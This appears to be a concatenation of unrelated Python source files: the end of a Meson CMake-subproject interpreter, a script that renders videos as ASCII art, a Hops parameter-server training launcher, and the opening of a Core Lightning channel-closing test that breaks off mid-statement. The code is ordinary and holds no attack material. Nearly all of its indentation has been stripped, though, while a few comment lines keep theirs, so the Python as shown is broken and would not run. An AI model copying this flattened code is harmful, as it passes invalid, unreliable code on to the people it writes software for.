self.build = build
self.subdir = subdir
self.src_dir = src_dir
self.build_dir_rel = os.path.join(subdir, '__CMake_build')
self.build_dir = os.path.join(env.get_build_dir(), self.build_dir_rel)
self.install_prefix = install_prefix
self.env = env
self.backend_name = backend.name
self.cmake_api = CMakeAPI.SERVER
self.client = CMakeClient(self.env)
self.fileapi = CMakeFileAPI(self.build_dir)
# Raw CMake results
self.bs_files = []
self.codemodel_configs = None
self.raw_trace = None
# Analysed data
self.project_name = ''
self.languages = []
self.targets = []
self.custom_targets = [] # type: List[ConverterCustomTarget]
self.trace = CMakeTraceParser()
self.output_target_map = OutputTargetMap(self.build_dir)
# Generated meson data
self.generated_targets = {}
self.internal_name_map = {}
def configure(self, extra_cmake_options: List[str]) -> None:
for_machine = MachineChoice.HOST # TODO make parameter
# Find CMake
cmake_exe = CMakeExecutor(self.env, '>=3.7', for_machine)
if not cmake_exe.found():
raise CMakeException('Unable to find CMake')
generator = backend_generator_map[self.backend_name]
cmake_args = cmake_exe.get_command()
trace_args = ['--trace', '--trace-expand', '--no-warn-unused-cli']
cmcmp_args = ['-DCMAKE_POLICY_WARNING_{}=OFF'.format(x) for x in disable_policy_warnings]
if version_compare(cmake_exe.version(), '>=3.14'):
self.cmake_api = CMakeAPI.FILE
self.fileapi.setup_request()
# Map meson compiler to CMake variables
for lang, comp in self.env.coredata.compilers[for_machine].items():
if lang not in language_map:
continue
cmake_lang = language_map[lang]
exelist = comp.get_exelist()
if len(exelist) == 1:
cmake_args += ['-DCMAKE_{}_COMPILER={}'.format(cmake_lang, exelist[0])]
elif len(exelist) == 2:
cmake_args += ['-DCMAKE_{}_COMPILER_LAUNCHER={}'.format(cmake_lang, exelist[0]),
'-DCMAKE_{}_COMPILER={}'.format(cmake_lang, exelist[1])]
if hasattr(comp, 'get_linker_exelist') and comp.get_id() == 'clang-cl':
cmake_args += ['-DCMAKE_LINKER={}'.format(comp.get_linker_exelist()[0])]
cmake_args += ['-G', generator]
cmake_args += ['-DCMAKE_INSTALL_PREFIX={}'.format(self.install_prefix)]
cmake_args += extra_cmake_options
# Run CMake
mlog.log()
with mlog.nested():
mlog.log('Configuring the build directory with', mlog.bold('CMake'), 'version', mlog.cyan(cmake_exe.version()))
mlog.log(mlog.bold('Running:'), ' '.join(cmake_args))
mlog.log(mlog.bold(' - build directory: '), self.build_dir)
mlog.log(mlog.bold(' - source directory: '), self.src_dir)
mlog.log(mlog.bold(' - trace args: '), ' '.join(trace_args))
mlog.log(mlog.bold(' - disabled policy warnings:'), '[{}]'.format(', '.join(disable_policy_warnings)))
mlog.log()
os.makedirs(self.build_dir, exist_ok=True)
os_env = os.environ.copy()
os_env['LC_ALL'] = 'C'
final_command = cmake_args + trace_args + cmcmp_args + [self.src_dir]
proc = Popen(final_command, stdout=PIPE, stderr=PIPE, cwd=self.build_dir, env=os_env)
def print_stdout():
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode('utf-8').strip('\n'))
proc.stdout.close()
t = Thread(target=print_stdout)
t.start()
# Read stderr line by line and log non-trace lines
self.raw_trace = ''
tline_start_reg = re.compile(r'^\s*(.*\.(cmake|txt))\(([0-9]+)\):\s*(\w+)\(.*$')
inside_multiline_trace = False
while True:
line = proc.stderr.readline()
if not line:
break
line = line.decode('utf-8')
if tline_start_reg.match(line):
self.raw_trace += line
inside_multiline_trace = not line.endswith(' )\n')
elif inside_multiline_trace:
self.raw_trace += line
else:
mlog.warning(line.strip('\n'))
proc.stderr.close()
proc.wait()
t.join()
mlog.log()
h = mlog.green('SUCCEEDED') if proc.returncode == 0 else mlog.red('FAILED')
mlog.log('CMake configuration:', h)
if proc.returncode != 0:
raise CMakeException('Failed to configure the CMake subproject')
def initialise(self, extra_cmake_options: List[str]) -> None:
# Run configure the old way because doing it
# with the server doesn't work for some reason
# Additionally, the File API requires a configure anyway
self.configure(extra_cmake_options)
# Continue with the file API if supported
if self.cmake_api is CMakeAPI.FILE:
# Parse the result
self.fileapi.load_reply()
# Load the buildsystem file list
cmake_files = self.fileapi.get_cmake_sources()
self.bs_files = [x.file for x in cmake_files if not x.is_cmake and not x.is_temp]
self.bs_files = [os.path.relpath(x, self.env.get_source_dir()) for x in self.bs_files]
self.bs_files = list(set(self.bs_files))
# Load the codemodel configurations
self.codemodel_configs = self.fileapi.get_cmake_configurations()
return
with self.client.connect():
generator = backend_generator_map[self.backend_name]
self.client.do_handshake(self.src_dir, self.build_dir, generator, 1)
# Do a second configure to initialise the server
self.client.query_checked(RequestConfigure(), 'CMake server configure')
# Generate the build system files
self.client.query_checked(RequestCompute(), 'Generating build system files')
# Get CMake build system files
bs_reply = self.client.query_checked(RequestCMakeInputs(), 'Querying build system files')
# Now get the CMake code model
cm_reply = self.client.query_checked(RequestCodeModel(), 'Querying the CMake code model')
src_dir = bs_reply.src_dir
self.bs_files = [x.file for x in bs_reply.build_files if not x.is_cmake and not x.is_temp]
self.bs_files = [os.path.relpath(os.path.join(src_dir, x), self.env.get_source_dir()) for x in self.bs_files]
self.bs_files = list(set(self.bs_files))
self.codemodel_configs = cm_reply.configs
def analyse(self) -> None:
if self.codemodel_configs is None:
raise CMakeException('CMakeInterpreter was not initialized')
# Clear analyser data
self.project_name = ''
self.languages = []
self.targets = []
self.custom_targets = []
self.trace = CMakeTraceParser(permissive=True)
# Parse the trace
self.trace.parse(self.raw_trace)
# Find all targets
for i in self.codemodel_configs:
for j in i.projects:
if not self.project_name:
self.project_name = j.name
for k in j.targets:
if k.type not in skip_targets:
self.targets += [ConverterTarget(k, self.env)]
# Add interface targets from trace, if not already present.
# This step is required because interface targets were removed from
# the CMake file API output.
api_target_name_list = [x.name for x in self.targets]
for i in self.trace.targets.values():
if i.type != 'INTERFACE' or i.name in api_target_name_list or i.imported:
continue
dummy = CMakeTarget({
'name': i.name,
'type': 'INTERFACE_LIBRARY',
'sourceDirectory': self.src_dir,
'buildDirectory': self.build_dir,
})
self.targets += [ConverterTarget(dummy, self.env)]
for i in self.trace.custom_targets:
self.custom_targets += [ConverterCustomTarget(i)]
# generate the output_target_map
for i in [*self.targets, *self.custom_targets]:
self.output_target_map.add(i)
# First pass: Basic target cleanup
object_libs = []
custom_target_outputs = [] # type: List[str]
for i in self.custom_targets:
i.postprocess(self.output_target_map, self.src_dir, self.subdir, self.build_dir, custom_target_outputs)
for i in self.targets:
i.postprocess(self.output_target_map, self.src_dir, self.subdir, self.install_prefix, self.trace)
if i.type == 'OBJECT_LIBRARY':
object_libs += [i]
self.languages += [x for x in i.languages if x not in self.languages]
# Second pass: Detect object library dependencies
for i in self.targets:
i.process_object_libs(object_libs)
# Third pass: Reassign dependencies to avoid some loops
for i in self.targets:
i.process_inter_target_dependencies()
for i in self.custom_targets:
i.process_inter_target_dependencies()
        # Fourth pass: Remove reassigned dependencies
for i in self.targets:
i.cleanup_dependencies()
mlog.log('CMake project', mlog.bold(self.project_name), 'has', mlog.bold(str(len(self.targets) + len(self.custom_targets))), 'build targets.')
def pretend_to_be_meson(self) -> CodeBlockNode:
if not self.project_name:
raise CMakeException('CMakeInterpreter was not analysed')
def token(tid: str = 'string', val='') -> Token:
return Token(tid, self.subdir, 0, 0, 0, None, val)
def string(value: str) -> StringNode:
return StringNode(token(val=value))
def id_node(value: str) -> IdNode:
return IdNode(token(val=value))
def number(value: int) -> NumberNode:
return NumberNode(token(val=value))
def nodeify(value):
if isinstance(value, str):
return string(value)
elif isinstance(value, bool):
return BooleanNode(token(), value)
elif isinstance(value, int):
return number(value)
elif isinstance(value, list):
return array(value)
return value
def indexed(node: BaseNode, index: int) -> IndexNode:
return IndexNode(node, nodeify(index))
def array(elements) -> ArrayNode:
args = ArgumentNode(token())
if not isinstance(elements, list):
elements = [args]
args.arguments += [nodeify(x) for x in elements if x is not None]
return ArrayNode(args, 0, 0, 0, 0)
def function(name: str, args=None, kwargs=None) -> FunctionNode:
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
args_n = ArgumentNode(token())
if not isinstance(args, list):
args = [args]
args_n.arguments = [nodeify(x) for x in args if x is not None]
args_n.kwargs = {k: nodeify(v) for k, v in kwargs.items() if v is not None}
func_n = FunctionNode(self.subdir, 0, 0, 0, 0, name, args_n)
return func_n
def method(obj: BaseNode, name: str, args=None, kwargs=None) -> MethodNode:
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
args_n = ArgumentNode(token())
if not isinstance(args, list):
args = [args]
args_n.arguments = [nodeify(x) for x in args if x is not None]
args_n.kwargs = {k: nodeify(v) for k, v in kwargs.items() if v is not None}
return MethodNode(self.subdir, 0, 0, obj, name, args_n)
def assign(var_name: str, value: BaseNode) -> AssignmentNode:
return AssignmentNode(self.subdir, 0, 0, var_name, value)
# Generate the root code block and the project function call
root_cb = CodeBlockNode(token())
root_cb.lines += [function('project', [self.project_name] + self.languages)]
# Add the run script for custom commands
run_script = '{}/data/run_ctgt.py'.format(os.path.dirname(os.path.realpath(__file__)))
run_script_var = 'ctgt_run_script'
root_cb.lines += [assign(run_script_var, function('find_program', [[run_script]], {'required': True}))]
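        # The two lines above roughly correspond to generated Meson code of the form
        # (names and paths are illustrative):
        #   project('<project_name>', '<languages...>')
        #   ctgt_run_script = find_program(['<...>/data/run_ctgt.py'], required : true)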
# Add the targets
processing = []
processed = {}
name_map = {}
def extract_tgt(tgt: Union[ConverterTarget, ConverterCustomTarget, CustomTargetReference]) -> IdNode:
tgt_name = None
if isinstance(tgt, (ConverterTarget, ConverterCustomTarget)):
tgt_name = tgt.name
elif isinstance(tgt, CustomTargetReference):
tgt_name = tgt.ctgt.name
assert(tgt_name is not None and tgt_name in processed)
res_var = processed[tgt_name]['tgt']
return id_node(res_var) if res_var else None
def detect_cycle(tgt: Union[ConverterTarget, ConverterCustomTarget]) -> None:
if tgt.name in processing:
raise CMakeException('Cycle in CMake inputs/dependencies detected')
processing.append(tgt.name)
def resolve_ctgt_ref(ref: CustomTargetReference) -> BaseNode:
tgt_var = extract_tgt(ref)
if len(ref.ctgt.outputs) == 1:
return tgt_var
else:
return indexed(tgt_var, ref.index)
def process_target(tgt: ConverterTarget):
detect_cycle(tgt)
# First handle inter target dependencies
link_with = []
objec_libs = [] # type: List[IdNode]
sources = []
generated = []
generated_filenames = []
custom_targets = []
dependencies = []
for i in tgt.link_with:
assert(isinstance(i, ConverterTarget))
if i.name not in processed:
process_target(i)
link_with += [extract_tgt(i)]
for i in tgt.object_libs:
assert(isinstance(i, ConverterTarget))
if i.name not in processed:
process_target(i)
objec_libs += [extract_tgt(i)]
for i in tgt.depends:
if not isinstance(i, ConverterCustomTarget):
continue
if i.name not in processed:
process_custom_target(i)
dependencies += [extract_tgt(i)]
# Generate the source list and handle generated sources
for i in tgt.sources + tgt.generated:
if isinstance(i, CustomTargetReference):
if i.ctgt.name not in processed:
process_custom_target(i.ctgt)
generated += [resolve_ctgt_ref(i)]
generated_filenames += [i.filename()]
if i.ctgt not in custom_targets:
custom_targets += [i.ctgt]
else:
sources += [i]
# Add all header files from all used custom targets. This
# ensures that all custom targets are built before any
# sources of the current target are compiled and thus all
# header files are present. This step is necessary because
# CMake always ensures that a custom target is executed
# before another target if at least one output is used.
for i in custom_targets:
for j in i.outputs:
if not is_header(j) or j in generated_filenames:
continue
generated += [resolve_ctgt_ref(i.get_ref(j))]
generated_filenames += [j]
# Determine the meson function to use for the build target
tgt_func = tgt.meson_func()
if not tgt_func:
raise CMakeException('Unknown target type "{}"'.format(tgt.type))
# Determine the variable names
inc_var = '{}_inc'.format(tgt.name)
dir_var = '{}_dir'.format(tgt.name)
sys_var = '{}_sys'.format(tgt.name)
src_var = '{}_src'.format(tgt.name)
dep_var = '{}_dep'.format(tgt.name)
tgt_var = tgt.name
# Generate target kwargs
tgt_kwargs = {
'link_args': tgt.link_flags + tgt.link_libraries,
'link_with': link_with,
'include_directories': id_node(inc_var),
'install': tgt.install,
'install_dir': tgt.install_dir,
'override_options': tgt.override_options,
'objects': [method(x, 'extract_all_objects') for x in objec_libs],
}
# Handle compiler args
for key, val in tgt.compile_opts.items():
tgt_kwargs['{}_args'.format(key)] = val
            # Handle -fPIC, etc.
if tgt_func == 'executable':
tgt_kwargs['pie'] = tgt.pie
elif tgt_func == 'static_library':
tgt_kwargs['pic'] = tgt.pie
# declare_dependency kwargs
dep_kwargs = {
'link_args': tgt.link_flags + tgt.link_libraries,
'link_with': id_node(tgt_var),
'compile_args': tgt.public_compile_opts,
'include_directories': id_node(inc_var),
}
if dependencies:
generated += dependencies
# Generate the function nodes
dir_node = assign(dir_var, function('include_directories', tgt.includes))
sys_node = assign(sys_var, function('include_directories', tgt.sys_includes, {'is_system': True}))
inc_node = assign(inc_var, array([id_node(dir_var), id_node(sys_var)]))
node_list = [dir_node, sys_node, inc_node]
if tgt_func == 'header_only':
del dep_kwargs['link_with']
dep_node = assign(dep_var, function('declare_dependency', kwargs=dep_kwargs))
node_list += [dep_node]
src_var = None
tgt_var = None
else:
src_node = assign(src_var, function('files', sources))
tgt_node = assign(tgt_var, function(tgt_func, [tgt_var, [id_node(src_var)] + generated], tgt_kwargs))
node_list += [src_node, tgt_node]
if tgt_func in ['static_library', 'shared_library']:
dep_node = assign(dep_var, function('declare_dependency', kwargs=dep_kwargs))
node_list += [dep_node]
else:
dep_var = None
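            # Taken together, node_list roughly corresponds to generated Meson code like
            # (illustrative; the src/tgt lines are skipped for header-only targets):
            #   <tgt>_dir = include_directories(...)
            #   <tgt>_sys = include_directories(..., is_system : true)
            #   <tgt>_inc = [<tgt>_dir, <tgt>_sys]
            #   <tgt>_src = files(...)
            #   <tgt>     = <tgt_func>('<tgt>', [<tgt>_src] + <generated>, ...)
            #   <tgt>_dep = declare_dependency(...)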
# Add the nodes to the ast
root_cb.lines += node_list
processed[tgt.name] = {'inc': inc_var, 'src': src_var, 'dep': dep_var, 'tgt': tgt_var, 'func': tgt_func}
name_map[tgt.cmake_name] = tgt.name
def process_custom_target(tgt: ConverterCustomTarget) -> None:
            # CMake allows specifying multiple commands in a custom target.
# To map this to meson, a helper script is used to execute all
# commands in order. This additionally allows setting the working
# directory.
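            # Illustratively, the resulting call has roughly this shape:
            #   <tgt> = custom_target('<name>', input : [...], output : [...],
            #                         command : [ctgt_run_script, '-o', '@OUTPUT@', '-d', <workdir>,
            #                                    <cmd1 ...>, ';;;', <cmd2 ...>, ';;;'])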
detect_cycle(tgt)
tgt_var = tgt.name # type: str
def resolve_source(x: Any) -> Any:
if isinstance(x, ConverterTarget):
if x.name not in processed:
process_target(x)
return extract_tgt(x)
if isinstance(x, ConverterCustomTarget):
if x.name not in processed:
process_custom_target(x)
return extract_tgt(x)
elif isinstance(x, CustomTargetReference):
if x.ctgt.name not in processed:
process_custom_target(x.ctgt)
return resolve_ctgt_ref(x)
else:
return x
# Generate the command list
command = []
command += [id_node(run_script_var)]
command += ['-o', '@OUTPUT@']
if tgt.original_outputs:
command += ['-O'] + tgt.original_outputs
command += ['-d', tgt.working_dir]
# Generate the commands. Subcommands are separated by ';;;'
for cmd in tgt.command:
command += [resolve_source(x) for x in cmd] + [';;;']
tgt_kwargs = {
'input': [resolve_source(x) for x in tgt.inputs],
'output': tgt.outputs,
'command': command,
'depends': [resolve_source(x) for x in tgt.depends],
}
root_cb.lines += [assign(tgt_var, function('custom_target', [tgt.name], tgt_kwargs))]
processed[tgt.name] = {'inc': None, 'src': None, 'dep': None, 'tgt': tgt_var, 'func': 'custom_target'}
# Now generate the target function calls
for i in self.custom_targets:
if i.name not in processed:
process_custom_target(i)
for i in self.targets:
if i.name not in processed:
process_target(i)
self.generated_targets = processed
self.internal_name_map = name_map
return root_cb
def target_info(self, target: str) -> Optional[Dict[str, str]]:
# Try resolving the target name
# start by checking if there is a 100% match (excluding the name prefix)
prx_tgt = generated_target_name_prefix + target
if prx_tgt in self.generated_targets:
return self.generated_targets[prx_tgt]
# check if there exists a name mapping
if target in self.internal_name_map:
target = self.internal_name_map[target]
assert(target in self.generated_targets)
return self.generated_targets[target]
return None
def target_list(self) -> List[str]:
prx_str = generated_target_name_prefix
prx_len = len(prx_str)
res = [x for x in self.generated_targets.keys()]
res = [x[prx_len:] if x.startswith(prx_str) else x for x in res]
return res
|
video_to_ascii.py
|
from image_to_ascii import image_to_ascii
import cv2,os,numpy as np
import concurrent.futures
from threading import Thread
from time import perf_counter,sleep as nap
import argparse
# may add sound later.
class ascii_video :
""" working of class
extract image and yield
convert into ascii image
save in the video
"""
ascii_range_dictCHARS = [
' ','.',
',',"'",
'"',':',
";",'-',
'*','~',
'+','=',
'?','/',
'|','#',
'%','₹',
'$','@']
def __init__(self,video,output_video,fps,pbs):
self.pbs = pbs
self.video_name = video
self.video_output_name = output_video
self.fps = fps
if not os.path.exists(self.video_name) : raise Exception("File not found!!!")
self.ascii_range_dictCHARS.reverse()
self.pixle_to_ascii_dict = {}
for index,key in enumerate(np.linspace(0,255,num=len(self.ascii_range_dictCHARS),endpoint=True)):
key = round(key)
if index == 0 :
last = index
continue
for px in range(last,key+1) :
self.pixle_to_ascii_dict[px] = self.ascii_range_dictCHARS[index]
last = key
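        # After this loop every grayscale value 0-255 maps to one character; with the
        # 20 characters above, each character covers a band of roughly 13-14 values.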
self.pixle_count_in_block = self.pbs**2
self.frame_list = []
def __enter__(self):
        # this will start reading and writing the frames
print("starting the functions ...")
# reading video stuff
self.vidcap = cv2.VideoCapture(self.video_name)
# fps set for reading and saving file
self.total_frames = int(self.vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
print("Total frame count is --> ",self.total_frames)
default_fps = round(self.vidcap.get(cv2.CAP_PROP_FPS))
print("default fps of video is --> ",default_fps)
if self.fps < default_fps : self.steps = round(default_fps/self.fps)
else : self.steps = 1
self.fps =int(default_fps/self.steps)
print("new fps of video is --> ",self.fps)
self.reader_completed = False
# extracting first frame for the setup
success,frame = self.vidcap.read()
self.width,self.height = tuple(list(frame.shape)[0:2][::-1]) # for creating ascii from the image
# blank black image
self.blank_black = np.zeros((self.height,self.width,3), np.uint8)
# for ascii conversion
        self.ascii_in_pixles = np.full([self.height//self.pbs,self.width//self.pbs], "", dtype=object) # plain object dtype; np.object is removed in newer numpy
# writting video stuff
self.writer = cv2.VideoWriter(self.video_output_name, cv2.VideoWriter_fourcc(*"mp4v"), self.fps,tuple(list(frame.shape)[0:2][::-1]) )
return self
def __exit__(self,a,b,c):
self.vidcap.release() # print(self.vidcap.isOpened())
print(f"\nSaving video as - { self.video_output_name }")
self.writer.release()
def iter_each_frame(self):
success = True
t1 = Thread(target = lambda : None )
t1.start()
while success:
            count = int(self.vidcap.get(cv2.CAP_PROP_POS_FRAMES)) # index of the next frame to be read
success,frame = self.vidcap.read()
if count%self.steps == 0 and success :
if success and self.total_frames > count :
print(f"Working on frame -> '{str(count).zfill(5)}'")
t1.join()
t1 = Thread(target = lambda : self.frame_list.append(frame))
t1.start()
# make it save frames in thread in frame list
self.reader_completed = True
print("Just funishing up last -",len(self.frame_list),"process 😄😄")
def image_to_ascii_convertor(self,image):
# read the image in the b&w format transpose it and return the ascii nested list for that
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).transpose()
ascii_in_pixles = np.copy(self.ascii_in_pixles)
        # note: this nested loop could be vectorized with numpy for more speed
for index_h,h in enumerate(range(0,self.height,self.pbs)) :
for index_w,w in enumerate(range(0,self.width,self.pbs)) :
try :
sum_ = sum(image[w:w + self.pbs,h:h+self.pbs].flatten())
average = round(float(sum_)/self.pixle_count_in_block)
ascii_in_pixles[index_h][index_w] = self.pixle_to_ascii_dict[average]
            except : pass # trailing blocks with fewer than pixle_count_in_block pixels are skipped, since they could produce irregular shading
return ascii_in_pixles
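    # Illustrative sizing note for image_to_ascii_convertor above: a 1920x1080 frame
    # with pbs = 15 yields an ASCII grid of height//pbs = 72 rows by width//pbs = 128 columns.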
def frame_to_ascii_to_ascii_image(self,current_frame):
# take frame extract ascii data and return the ascii image
# print('converting to ASCII images' ,end = " - ")
ascii_data = self.image_to_ascii_convertor(current_frame)
        # start from a copy of the blank black canvas
image = np.copy(self.blank_black)
# np.zeros((self.height,self.width,3), np.uint8)
# updating the text in it
for index_r,row in enumerate(ascii_data) :
for index_c,ascii_val in enumerate(row) :
if ascii_val.strip() != "" :
image = cv2.putText(image,ascii_val,(index_c*self.pbs,(index_r+1)*self.pbs),cv2.FONT_HERSHEY_PLAIN,0.9,(255,255,255),1)
return image
def add_ascii_frame(self,frame):
# convert the frame into ascii then convert the ascii to ascii frame
ascii_frame = self.frame_to_ascii_to_ascii_image(frame)
self.writer.write(ascii_frame) # save the frame
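    # Descriptive note: frame_thread_superviser below repeatedly converts whatever
    # frames the reader thread has queued so far (using a thread pool), writes the
    # resulting ASCII frames to the output video, and does one final drain pass
    # once the reader signals completion.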
def frame_thread_superviser(self):
print("working on image computing")
while not self.reader_completed :
with concurrent.futures.ThreadPoolExecutor() as executor:
new_frames = executor.map(self.frame_to_ascii_to_ascii_image , self.frame_list )
for new_frame in new_frames:
Thread(target=lambda : self.frame_list.pop(0) ).start()
self.writer.write(new_frame) # save the frame
print("Just funishing up last -",len(self.frame_list),"process 😄😄")
with concurrent.futures.ThreadPoolExecutor() as executor:
new_frames = executor.map(self.frame_to_ascii_to_ascii_image , self.frame_list )
for new_frame in new_frames:
Thread(target=lambda : self.frame_list.pop(0) ).start()
self.writer.write(new_frame) # save the frame
print('Done. 😎')
@classmethod
def runner(cls,video,output_video,fps,pbs):
with cls(video,output_video,fps,pbs) as ascii_video :
reader = Thread(target= ascii_video.iter_each_frame )
reader.start()
# start the frame saving thread
saver = Thread(target = ascii_video.frame_thread_superviser)
saver.start()
# waiting for complete all the reading frames
reader.join()
print('waiting for the results...')
saver.join()
# example - args: inputVideo, outputVideo, fps, pbs
# ascii_video.runner('ab.mp4',"Ascii_video2.mp4",30,10)
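# Assumed command-line usage (based on the argparse flags below):
#   python video_to_ascii.py -f input.mp4 -o Ascii_video.mp4 --fps 20 --pbs 15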
if __name__ == "__main__" :
parser = argparse.ArgumentParser()
    parser.add_argument('-f','--file' ,help = "name of the input video file, including the extension")
    parser.add_argument('-o','--outfile',default = "Ascii_video.mp4" ,help = "name of the output file")
    parser.add_argument('--fps' ,default = 20,type = int,help = "fps of the output video (default = 20)")
    parser.add_argument('--pbs' ,default = 15,type = int,help = "pixel block size; smaller values give finer results but slower processing (default = 15)")
args = parser.parse_args()
print(args)
if args.file:
start = perf_counter()
ascii_video.runner(args.file,args.outfile,args.fps,args.pbs)
finish = perf_counter()
print(f"Total time Taken {finish - start}s")
else :
        raise Exception('an input file name is required; use -h for help')
|
parameter_server.py
|
"""
Utility functions to retrieve information about available services and setting up security for the Hops platform.
These utils facilitates development by hiding complexity for programs interacting with Hops services.
"""
import os
from hops import hdfs as hopshdfs
from hops import tensorboard
from hops import devices
from hops import util
import pydoop.hdfs
import threading
import datetime
import socket
import json
from . import parameter_server_reservation
run_id = 0
def _launch(sc, map_fun, local_logdir=False, name="no-name"):
"""
Args:
sc:
map_fun:
local_logdir:
name:
Returns:
"""
global run_id
app_id = str(sc.applicationId)
num_executions = util.num_executors()
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup("ParameterServerStrategy", "{} | Distributed Training".format(name))
server = parameter_server_reservation.Server(num_executions)
server_addr = server.start()
num_ps = util.num_param_servers()
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, num_ps))
logdir = _get_logdir(app_id)
path_to_metric = logdir + '/metric'
if pydoop.hdfs.path.exists(path_to_metric):
with pydoop.hdfs.open(path_to_metric, "r") as fi:
metric = float(fi.read())
fi.close()
return metric, logdir
print('Finished Experiment \n')
return None, logdir
def _get_logdir(app_id):
"""
Args:
app_id:
Returns:
"""
global run_id
return hopshdfs._get_experiments_dir() + '/' + app_id + '/parameter_server/run.' + str(run_id)
def _prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, num_ps):
"""
Args:
app_id:
run_id:
map_fun:
local_logdir:
server_addr:
num_ps:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
tb_hdfs_path = ''
hdfs_exec_logdir = ''
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
role = None
client = parameter_server_reservation.Client(server_addr)
try:
host = util._get_ip_address()
tmp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmp_socket.bind(('', 0))
port = tmp_socket.getsockname()[1]
host_port = host + ":" + str(port)
exec_spec = {}
if executor_num < num_ps:
exec_spec["task_type"] = "ps"
else:
exec_spec["task_type"] = "worker"
exec_spec["host_port"] = host_port
exec_spec["gpus_present"] = devices.get_num_gpus() > 0
client.register(exec_spec)
cluster = client.await_reservations()
tmp_socket.close()
role, index = _find_task_and_index(host_port, cluster)
cluster_spec = {}
cluster_spec["cluster"] = cluster
cluster_spec["task"] = {"type": role, "index": index}
print(cluster_spec)
os.environ["TF_CONFIG"] = json.dumps(cluster_spec)
if role == "chief":
hdfs_exec_logdir, hdfs_appid_logdir = hopshdfs._create_directories(app_id, run_id, None, 'parameter_server')
pydoop.hdfs.dump('', os.environ['EXEC_LOGFILE'], user=hopshdfs.project_user())
hopshdfs._init_logger()
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir)
gpu_str = '\nChecking for GPUs in the environment' + devices._get_gpu_info()
if role == "chief":
hopshdfs.log(gpu_str)
print(gpu_str)
print('-------------------------------------------------------')
print('Started running task \n')
if role == "chief":
hopshdfs.log('Started running task')
task_start = datetime.datetime.now()
retval=None
if role == "ps":
ps_thread = threading.Thread(target=lambda: map_fun())
ps_thread.start()
print("waiting for workers")
client.await_all_workers_finished()
print("waiting finished")
else:
retval = map_fun()
if role == "chief":
if retval:
_handle_return(retval, hdfs_exec_logdir)
task_end = datetime.datetime.now()
time_str = 'Finished task - took ' + util._time_diff(task_start, task_end)
print('\n' + time_str)
print('-------------------------------------------------------')
if role == "chief":
hopshdfs.log(time_str)
except:
raise
finally:
if role == "worker" or role == "chief":
client.register_worker_finished()
client.close()
if role == "chief":
if local_logdir:
local_tb = tensorboard.local_logdir_path
util._store_local_tensorboard(local_tb, hdfs_exec_logdir)
if devices.get_num_gpus() > 0:
t.do_run = False
t.join(20)
_cleanup(tb_hdfs_path)
return _wrapper_fun
def _cleanup(tb_hdfs_path):
"""
Args:
tb_hdfs_path:
Returns:
"""
handle = hopshdfs.get()
    if tb_hdfs_path is not None and tb_hdfs_path != '' and handle.exists(tb_hdfs_path):
handle.delete(tb_hdfs_path)
hopshdfs._kill_logger()
def _find_task_and_index(host_port, cluster_spec):
"""
Args:
host_port:
cluster_spec:
Returns:
"""
index = 0
for entry in cluster_spec["worker"]:
if entry == host_port:
return "worker", index
index = index + 1
index = 0
for entry in cluster_spec["ps"]:
if entry == host_port:
return "ps", index
index = index + 1
if cluster_spec["chief"][0] == host_port:
return "chief", 0
def _handle_return(val, hdfs_exec_logdir):
"""
Args:
val:
hdfs_exec_logdir:
Returns:
"""
try:
test = int(val)
except:
raise ValueError('Your function should return a metric (number).')
metric_file = hdfs_exec_logdir + '/metric'
fs_handle = hopshdfs.get_fs()
try:
fd = fs_handle.open_file(metric_file, mode='w')
except:
fd = fs_handle.open_file(metric_file, flags='w')
fd.write(str(float(val)).encode())
fd.flush()
fd.close()
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError, Millisatoshi
from shutil import copyfile
from pyln.testing.utils import SLOW_MACHINE
from utils import (
only_one, sync_blockheight, wait_for, TIMEOUT,
account_balance, first_channel_id, closing_fee, TEST_NETWORK,
scriptpubkey_addr, calc_lease_fee, EXPERIMENTAL_FEATURES
)
import os
import queue
import pytest
import re
import subprocess
import threading
import unittest
@pytest.mark.developer("Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind, chainparams):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
fee = closing_fee(3750, 2) if not chainparams['elements'] else 3603
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
